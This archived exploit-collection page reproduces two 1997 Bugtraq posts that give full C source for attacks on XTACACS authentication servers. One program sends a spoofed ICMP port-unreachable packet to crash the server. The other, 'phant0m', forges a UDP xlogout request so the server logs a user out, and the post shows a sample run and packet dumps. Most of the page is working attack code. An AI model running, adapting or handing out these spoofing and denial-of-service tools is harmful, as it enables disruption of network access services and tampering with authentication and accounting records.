DOS attack on XTACACS servers
Description: | You can crash these servers by sending ICMP unreachable messages to them. |
Author: | Coaxial Karma <c_karma@HOTMAIL.COM> |
Compromise: | remotely crash vulnerable XTACACS servers. |
Vulnerable Systems: | some XTACACS servers |
Date: | 23 December 1997 |
Date: Tue, 23 Dec 1997 11:21:06 PST
From: Coaxial Karma <c_karma@HOTMAIL.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Crashing an XTACACS authentication server
Hi,
I dunno if what follows has already been posted or not... Sorry if it
has
been.
I recently discovered that when an ISP was using XTACACS server from
Vikas Aggarwal (vikas@navya.com) in a standalone mode, it was possible
to
make the XTACACS server crash by sending it different type of ICMP
messages.
In order to exploit this, you only have to an ICMP unreachable message
specifying port unreachable.
Coaxial Karma
c_karma@hotmail.com
--- cut here ---
/************************************************************************
*
* xtacacs/udp killer v1.0 by Coaxial Karma, c_karma@hotmail.com
* Modified version of nEWk.c by HyperioN
*
* Only few code has been modified: the loop for sending fake ICMP
packets
* has been removed and arguments provided also changed.
*
************************************************************************/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
int size;
#define RESOLVE_QUIET
#define IPHDRSIZE sizeof(struct iphdr)
#define ICMPHDRSIZE sizeof(struct icmphdr)
unsigned char *dest_name;
unsigned char *origdest_name;
unsigned char *spoof_name = NULL;
struct sockaddr_in destaddr;
unsigned long origdest_addr;
unsigned long dest_addr;
unsigned long spoof_addr;
unsigned char type;
unsigned long seq;
int x=1;
int cize;
char *unreachables[] = {"Network unreachable",
"Host unreachable",
"Protocol unreachable",
"Port unreachable",
"Fragmantation needed and DF set",
"Source route failed",
"Network unknown",
"Host unknown",
"Source host is isolated",
"Network administratively unreachable",
"Host administratively unreachable",
"Network unreachable - type of service",
"Host unreachable - type of service"};
void banner(void)
{
printf("\nxtacacs/udp killer v1.0 by Coaxial Karma\n");
printf("modified version of nEWk.c (HyperioN)\n");
}
void usage(const char *progname)
{
printf("usage:\n");
printf("%s <source> <dest>\n\n",progname);
printf("\t<source> : address of fake ICMP packet sender\n");
printf("\t<dest> : destination of the unreach message\n");
printf("\n");
}
int resolve( const char *name, struct sockaddr_in *addr, int port )
{
struct hostent *host;
bzero(addr,sizeof(struct sockaddr_in));
if (( host = gethostbyname(name) ) == NULL ) {
#ifndef RESOLVE_QUIET
fprintf(stderr,"unable to resolve host \"%s\" -- ",name);
perror("");
#endif
return -1;
}
addr->sin_family = host->h_addrtype;
memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
addr->sin_port = htons(port);
return 0;
}
int resolve_one(const char *name, unsigned long *addr, const char *desc)
{
struct sockaddr_in tempaddr;
if (resolve(name, &tempaddr,0) == -1) {
printf("error: can't resolve the %s.\n",desc);
return -1;
}
*addr = tempaddr.sin_addr.s_addr;
return 0;
}
int resolve_all(const char *origdest,
const char *dest,
const char *spoof)
{
if (resolve_one(origdest,&origdest_addr,"origdest address"))
return -1;
if (resolve_one(dest,&dest_addr,"dest address")) return -1;
if (spoof!=NULL)
if (resolve_one(spoof,&spoof_addr,"spoof address")) return -1;
destaddr.sin_addr.s_addr = dest_addr;
destaddr.sin_family = AF_INET;
destaddr.sin_port = 0;
}
/*
* From ping.c (from original nuke.c)
*/
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}
/*
* This from echok, but with some mods (snuke.c) for unreach.
*/
inline int icmp_unreach_send(int socket,
struct sockaddr_in *address,
unsigned char icmp_code,
unsigned long spoof_addr,
unsigned long s_addr,
unsigned long t_addr,
unsigned s_port,
unsigned t_port,
unsigned long seq)
{
unsigned char packet[4098];
struct iphdr *ip;
struct icmphdr *icmp;
struct iphdr *origip;
unsigned char *data;
int i;
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *)(packet+IPHDRSIZE);
origip = (struct iphdr *)(packet+IPHDRSIZE+ICMPHDRSIZE);
data = (char *)(packet+IPHDRSIZE+IPHDRSIZE+ICMPHDRSIZE);
memset(packet, 0, 4098);
ip->saddr = spoof_addr;
ip->daddr = t_addr;
ip->version = 4;
ip->ihl = 5;
ip->ttl = 255-random()%15;
ip->protocol = IPPROTO_ICMP;
ip->tot_len = htons(IPHDRSIZE + size + ICMPHDRSIZE + IPHDRSIZE
+ 8);
ip->check = in_cksum(packet,IPHDRSIZE);
origip->saddr = t_addr; /* this is the 'original' header.
*/
origip->daddr = s_addr;
origip->version = 4;
origip->ihl = 5;
origip->ttl = ip->ttl - random()%15;
origip->protocol = IPPROTO_UDP;
origip->tot_len = IPHDRSIZE + 30;
origip->id = random()%69;
origip->check = in_cksum(origip,IPHDRSIZE);
*((unsigned int *)data) = htons(s_port);
*((unsigned int *)(data+2)) = htons(t_port);
*((unsigned long *)(data+4)) = htonl(seq);
/* 'original IP header + 64 bits (of bogus TCP header)' made. */
icmp->type = 3;
icmp->code = icmp_code;
icmp->checksum = in_cksum(icmp,size+ICMPHDRSIZE+IPHDRSIZE+8);
/* the entire ICMP packet it now ready. */
#ifdef ICMP_PKT_DEBUG
printf("Packet ready. Dump: \n");
for (i=0;i<IPHDRSIZE+ICMPHDRSIZE+IPHDRSIZE+8;i++)
printf("%02X%c",*(packet+i),((i+1)%16) ? ' ' : '\n');
printf("\n");
#endif
return
sendto(socket,packet,IPHDRSIZE+size+ICMPHDRSIZE+IPHDRSIZE+8,0,
(struct sockaddr *)address,sizeof(struct
sockaddr));
/* ICMP packet is now over the net. */
}
void main(int argc, char * *argv) {
int s;
banner();
if (argc != 3) {
usage(argv[0]);
return;
}
type = 3;
seq=31331;
spoof_name = argv[1];
dest_name = argv[2];
origdest_name = argv[1];
resolve_all(origdest_name, dest_name, spoof_name);
s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
#ifdef IP_HDRINCL
printf("We have IP_HDRINCL :-)\n\n");
if (setsockopt(s,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0)
{
perror("setsockopt IP_HDRINCL");
exit(1);
};
#else
printf("We don't have IP_HDRINCL :-(\n\n");
#endif
if(icmp_unreach_send(s,&destaddr,type,spoof_addr,origdest_addr,dest_addr,49,49,seq++)==
-1) {
printf("%s: error sending packet\n",argv[0]);
perror("");
return;
}
}
--- cut here ---
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com
[Note: You may have to use save-as from your browser and edit with
a text editor to recover the code. It hasn't been htmlized --Fyodor]
Date: Tue, 23 Dec 1997 11:23:43 PST
From: Coaxial Karma
To: BUGTRAQ@NETSPACE.ORG
Subject: Faking logout with XTACACS
Hi,
I dunno if what follows has already been posted or not... Sorry if it
has
been.
I recently discovered that when a Terminal Server (TS) was using XTACACS
as authentication protocol, it was possible to make the XTACACS server
believes that you've disconnected.
In order to exploit this, you only have to send an xlogout request to
the
XTACACS server claiming to be from the TS. Here is an example:
--- begin ---
koax# taclast | grep silger | head -1
silger tty16 ts.c-a.org Thu Dec 10 10:02 still logged in
koax# ./phant0m ts.c-a.org xtacacs.c-a.org 16
koax# taclast | grep silger | head -1
silger tty16 ts.c-a.org Thu Dec 10 10:02 - 10:03 (00:01) 72
koax#
--- end ---
The first packet is the one I sent to XTACACS authentication server and
the second one is the answer from the XTACACS authentication server to
the
TS.
10:03:24.000000 ts.c-a.org.49 > xtacacs.c-a.org.49: udp 56
4500 5400 3412 0000 ff11 6785 cee7 d20d
cee7 d202 3100 3100 4000 0000 8007 0000
0700 0004 0000 0000 0000 0000 0000 000f
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000
10:03:24.000000 xtacacs.c-a.org.49 > ts.c-a.org.49: udp 28
4500 3800 ce7c 0000 4011 bc07 cee7 d202
cee7 d20d 3100 3100 2400 bfe6 8002 0000
0700 0100 0000 0000 0000 0000 0000 000f
0000 0000 0000 0000
Coaxial Karma
c_karma@hotmail.com
--- cut here ---
/************************************************************************
*
* phant0m v1.0 by Coaxial Karma, c_karma@hotmail.com
* Modified version of arnudp.c v0.01 by Arny, cs6171@scitsc.wlv.ac.uk
*
************************************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
struct sockaddr sa;
main(int argc,char **argv)
{
int fd;
int x=1;
struct sockaddr_in *sin;
struct hostent *he;
u_char gram[84]=
{
/* IP Header */
0x45, 0x00, 0x00, 0x26,
0x12, 0x34, 0x00, 0x00,
0xFF, 0x11, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
/* UDP Header */
0x00, 0x31, 0x00, 0x31,
0x00, 0x40, 0x00, 0x00,
/* Data */
0x80, 0x07, 0x00, 0x00,
0x07, 0x00, 0x00, 0x04,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x05,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00
};
if (argc != 4)
{
fprintf(stderr, "usage: %s SRC-IP DST-IP TTY\n", *argv);
exit(1);
};
if ((he = gethostbyname(argv[1])) == NULL)
{
fprintf(stderr, "Can't resolve source hostname\n");
exit(1);
};
bcopy(*(he->h_addr_list), (gram+12), 4);
if ((he = gethostbyname(argv[2])) == NULL)
{
fprintf(stderr, "Can't resolve destination hostname\n");
exit(1);
};
bcopy(*(he->h_addr_list), (gram+16), 4);
*(u_short *) (gram + 46) = htons((u_short) atoi(argv[3]));
sin = (struct sockaddr_in *) &sa;
sin->sin_family = AF_INET;
bcopy(*(he->h_addr_list), &(sin->sin_addr), sizeof(struct in_addr));
if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
{
perror("socket");
exit(1);
};
#ifdef IP_HDRINCL
if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0)
{
perror("setsockopt IP_HDRINCL");
exit(1);
};
#else
fprintf(stderr, "We don't have IP_HDRINCL.\n\n");
exit(1);
#endif
if ((sendto(fd, &gram, sizeof(gram), 0, (struct sockaddr *) sin,
sizeof(struct sockaddr))) == -1)
{
perror("sendto");
exit(1);
};
}
--- cut here ---
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: